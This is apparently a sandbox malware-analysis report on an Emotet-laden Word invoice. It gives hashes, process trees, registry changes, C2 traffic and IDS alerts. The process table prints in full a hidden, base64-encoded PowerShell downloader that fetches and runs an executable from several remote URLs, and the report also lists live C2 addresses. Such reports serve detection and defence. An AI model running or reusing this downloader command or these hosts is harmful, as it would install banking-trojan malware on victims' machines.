File name: | Invoice_F57_057.doc |
Full analysis: | https://app.any.run/tasks/92624ab9-facf-40c4-96b1-a1a2a0e69154 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2019, 22:27:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Cupiditate fugiat quis., Author: Finia Weimer, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 19:43:00 2019, Last Saved Time/Date: Fri Dec 6 19:43:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 334, Security: 0 |
MD5: | 249FB1F21217BD56ED4C7726E265DDA0 |
SHA1: | 0A9B46F354959F108846E2DE00DABCDE1DFD34BE |
SHA256: | 0799DC08DCCB907F885B2197317FFAD974CEA69A14D716267B2431FA4310CC3F |
SSDEEP: | 3072:tqqbku3hyW6dKLQ2y/Gdy2ktGDWLS0HZWD5w8K7NkjyD7IBUAniVfJdXZQvq:wqbku3hyW6dK02k4stGiL3HJkjyD7bTT |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Cupiditate fugiat quis. |
---|---|
Subject: | - |
Author: | Finia Weimer |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:12:06 19:43:00 |
ModifyDate: | 2019:12:06 19:43:00 |
Pages: | 1 |
Words: | 58 |
Characters: | 334 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 2 |
Paragraphs: | 1 |
CharCountWithSpaces: | 391 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2764 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice_F57_057.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
3676 | powershell -w hidden -en JABBAHMAYQB1AGMAbgBhAHEAZQB6AGgAPQAnAEkAcgB3AHkAeABsAHcAdwBtAGMAaAAnADsAJABGAHAAZwB4AGcAbgBwAHQAIAA9ACAAJwAxADEAJwA7ACQAVgBhAHQAbQB6AHEAZABnAG4AagBzAD0AJwBRAG0AZwB1AHUAbABjAHkAZwBqAG8AcwBoACcAOwAkAFUAaABnAGoAbQBiAGoAcQBjAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAcABnAHgAZwBuAHAAdAArACcALgBlAHgAZQAnADsAJABPAHAAdAB0AHcAeQBmAHEAbABuAGgAZAA9ACcARABuAGcAeQBwAGcAagBnACcAOwAkAFAAeQBwAGsAegB4AGoAdAB3AD0ALgAoACcAbgBlAHcALQAnACsAJwBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAFcAZQBiAEMAbABpAEUAbgBUADsAJABCAGQAaABwAHgAZwBsAHkAPQAnAGgAdAB0AHAAOgAvAC8AbgBlAHcAdAByAGUAbgBkAG0AYQBsAGwALgBzAHQAbwByAGUALwAwADEALQBpAG4AcwB0AGEAbABsAC8AYgBGAE4AaQBXAG4AVgBWAEkALwAqAGgAdAB0AHAAOgAvAC8AcwBjAGEAbQBtAGUAcgByAGUAdgBpAGUAdwBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBEAFMAcwBjAFgASABtAC8AKgBoAHQAdABwADoALwAvAG4AYQBtAGkAcwBhAGYAZgByAG8AbgAuAGMAbwBtAC8AdgA1ADkAcgBuAGkALwBaAFQAdQBhAEoAYQBuAGMAbwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbwBvAGQAZABhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBkAGUANABwADIAZQBjADMALQB3AGoANABtAGcAaABqAG8AdQAtADEANQA4ADgAOQAvACoAaAB0AHQAcABzADoALwAvAG0AYQB4AGIAaQBsAGwALgBkAGUAdgBwAGEAYwBlAC4AbgBlAHQALwBCAGwAbwBnAC8AdgBsADAAMQBzAC0AMwBiAHUAcQBjAGoALQAwADkAOAAwADcANwAzADAANAAxAC8AJwAuACIAUwBwAGAAbABpAFQAIgAoACcAKgAnACkAOwAkAE8AZABxAG8AcQBlAHUAcwB2AGkAPQAnAFEAeQBjAHgAbAB3AHUAZwBuAGgAcwB2AGQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAeAB3AGoAZgB2AHYAdABnAGgAYwAgAGkAbgAgACQAQgBkAGgAcAB4AGcAbAB5ACkAewB0AHIAeQB7ACQAUAB5AHAAawB6AHgAagB0AHcALgAiAEQAYABvAHcATgBsAG8AQQBkAGAARgBgAGkATABFACIAKAAkAFkAeAB3AGoAZgB2AHYAdABnAGgAYwAsACAAJABVAGgAZwBqAG0AYgBqAHEAYwBsACkAOwAkAFQAcgBwAGwAaQBoAGcAZgB0AD0AJwBaAGgAdABwAGkAYgBrAGYAdwBpAHcAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABVAGgAZwBqAG0AYgBqAHEAYwBsACkALgAiAGwAZQBuAGAARwBgAFQASAAiACAALQBnAGUAIAAzADQAMAA4ADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAQQByAHQAIgAoACQAVQBoAGcAagBtAGIAagBxAGMAbAApADsAJABMAGIAegBoAGsAdQBsAHUAdgBhAGEAPQAnAEkAcQBrAHQAaQBwAHUAdwBuAG4AeAB6AHIAJwA7AGIAcgBlAGEAawA7ACQAWgBhAHgAegB1AHkAeABmAGcAeABqAG0AZgA9ACcAUwBvAGMAZQBjAHAAbQBvAG4AYwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAG8AYgBpAHMAagBuAHUAdgBkAGIAPQAnAEwAbABkAHYAegBkAHAAcgBjAHUAagB3AG0AJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1724 | "C:\Users\admin\11.exe" | C:\Users\admin\11.exe | — | powershell.exe | |||||||||||
User: admin Integrity Level: MEDIUM Description: OPENGL MFC Application Exit code: 0 Version: 1, 0, 0, 1 Modules
| |||||||||||||||
3044 | --eb6c268a | C:\Users\admin\11.exe | 11.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: OPENGL MFC Application Exit code: 0 Version: 1, 0, 0, 1 Modules
| |||||||||||||||
2684 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 11.exe | |||||||||||
User: admin Integrity Level: MEDIUM Description: OPENGL MFC Application Exit code: 0 Version: 1, 0, 0, 1 Modules
| |||||||||||||||
736 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: OPENGL MFC Application Version: 1, 0, 0, 1 Modules
|
(PID) Process: | (2764) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | `<c |
Value: 603C6300CC0A0000010000000000000000000000 | |||
(PID) Process: | (2764) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2764) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1041 |
Value: Off | |||
(PID) Process: | (2764) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1046 |
Value: Off | |||
(PID) Process: | (2764) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1036 |
Value: Off | |||
(PID) Process: | (2764) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1031 |
Value: Off | |||
(PID) Process: | (2764) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1040 |
Value: Off | |||
(PID) Process: | (2764) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1049 |
Value: Off | |||
(PID) Process: | (2764) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 3082 |
Value: Off | |||
(PID) Process: | (2764) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1334181950 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2764 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA860.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2764 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB662160.wmf | — | |
MD5:— | SHA256:— | |||
2764 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7DBF1E1.wmf | — | |
MD5:— | SHA256:— | |||
2764 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C783EE6E.wmf | — | |
MD5:— | SHA256:— | |||
2764 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB70EF97.wmf | — | |
MD5:— | SHA256:— | |||
2764 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29F154AC.wmf | — | |
MD5:— | SHA256:— | |||
2764 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DC9D4BD.wmf | — | |
MD5:— | SHA256:— | |||
2764 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64781B9A.wmf | — | |
MD5:— | SHA256:— | |||
2764 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A722C2D3.wmf | — | |
MD5:— | SHA256:— | |||
2764 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CFEF6B8.wmf | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
736 | serialfunc.exe | POST | 200 | 72.69.99.47:80 | http://72.69.99.47/qtpyj43mx | US | binary | 148 b | malicious |
736 | serialfunc.exe | POST | 200 | 72.69.99.47:80 | http://72.69.99.47/sEjpv63wxwLKR9f | US | binary | 1.38 Mb | malicious |
736 | serialfunc.exe | POST | 200 | 92.119.123.10:8080 | http://92.119.123.10:8080/fUJaIKgIbybQ1Nr6znj | unknown | binary | 2.67 Mb | malicious |
736 | serialfunc.exe | POST | 200 | 92.119.123.10:8080 | http://92.119.123.10:8080/qtpyj43mx | unknown | binary | 148 b | malicious |
736 | serialfunc.exe | POST | 200 | 92.119.123.10:8080 | http://92.119.123.10:8080/udPZuEnaI6k1 | unknown | binary | 275 Kb | malicious |
736 | serialfunc.exe | POST | 200 | 92.119.123.10:8080 | http://92.119.123.10:8080/iIKUvw9B | unknown | binary | 412 Kb | malicious |
736 | serialfunc.exe | POST | — | 172.90.70.168:443 | http://172.90.70.168:443/wer4jV4l3k4 | US | — | — | malicious |
736 | serialfunc.exe | POST | 200 | 92.119.123.10:8080 | http://92.119.123.10:8080/qtpyj43mx | unknown | binary | 148 b | malicious |
736 | serialfunc.exe | POST | 200 | 92.119.123.10:8080 | http://92.119.123.10:8080/8Et7Or | unknown | binary | 138 Kb | malicious |
736 | serialfunc.exe | POST | 200 | 92.119.123.10:8080 | http://92.119.123.10:8080/fUJaIKgIbybQ1Nr6znj | unknown | binary | 140 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
736 | serialfunc.exe | 72.69.99.47:80 | — | MCI Communications Services, Inc. d/b/a Verizon Business | US | malicious |
3676 | powershell.exe | 93.115.151.36:80 | newtrendmall.store | Asiatech Data Transfer Inc PLC | IR | suspicious |
736 | serialfunc.exe | 172.90.70.168:443 | — | Time Warner Cable Internet LLC | US | malicious |
736 | serialfunc.exe | 92.119.123.10:8080 | — | — | — | malicious |
736 | serialfunc.exe | 94.23.3.165:465 | — | OVH SAS | FR | unknown |
736 | serialfunc.exe | 211.13.204.5:25 | pop.ways-wp.co.jp | Computer Engineering & Consulting, Ltd. | JP | unknown |
736 | serialfunc.exe | 211.115.80.188:587 | gw.zinitix.com | LG DACOM Corporation | KR | unknown |
736 | serialfunc.exe | 62.149.178.101:465 | imap.vodafone.it | Aruba S.p.A. | IT | unknown |
736 | serialfunc.exe | 79.124.90.37:587 | mail.website.bg | Telepoint Ltd | BG | unknown |
736 | serialfunc.exe | 211.13.204.5:465 | pop.ways-wp.co.jp | Computer Engineering & Consulting, Ltd. | JP | unknown |
Domain | IP | Reputation |
---|---|---|
newtrendmall.store |
| suspicious |
pop.uco.co.za |
| unknown |
imap.ionos.co.uk |
| unknown |
pop3.joemorolong.gov.za |
| unknown |
mail.website.bg |
| unknown |
pop-mail.outlook.com |
| shared |
imap.1und1.de |
| shared |
gw.zinitix.com |
| unknown |
pop.ways-wp.co.jp |
| unknown |
imap.vodafone.it |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3676 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3676 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3676 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
736 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
736 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |
736 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
736 | serialfunc.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
736 | serialfunc.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 22 |
736 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
736 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |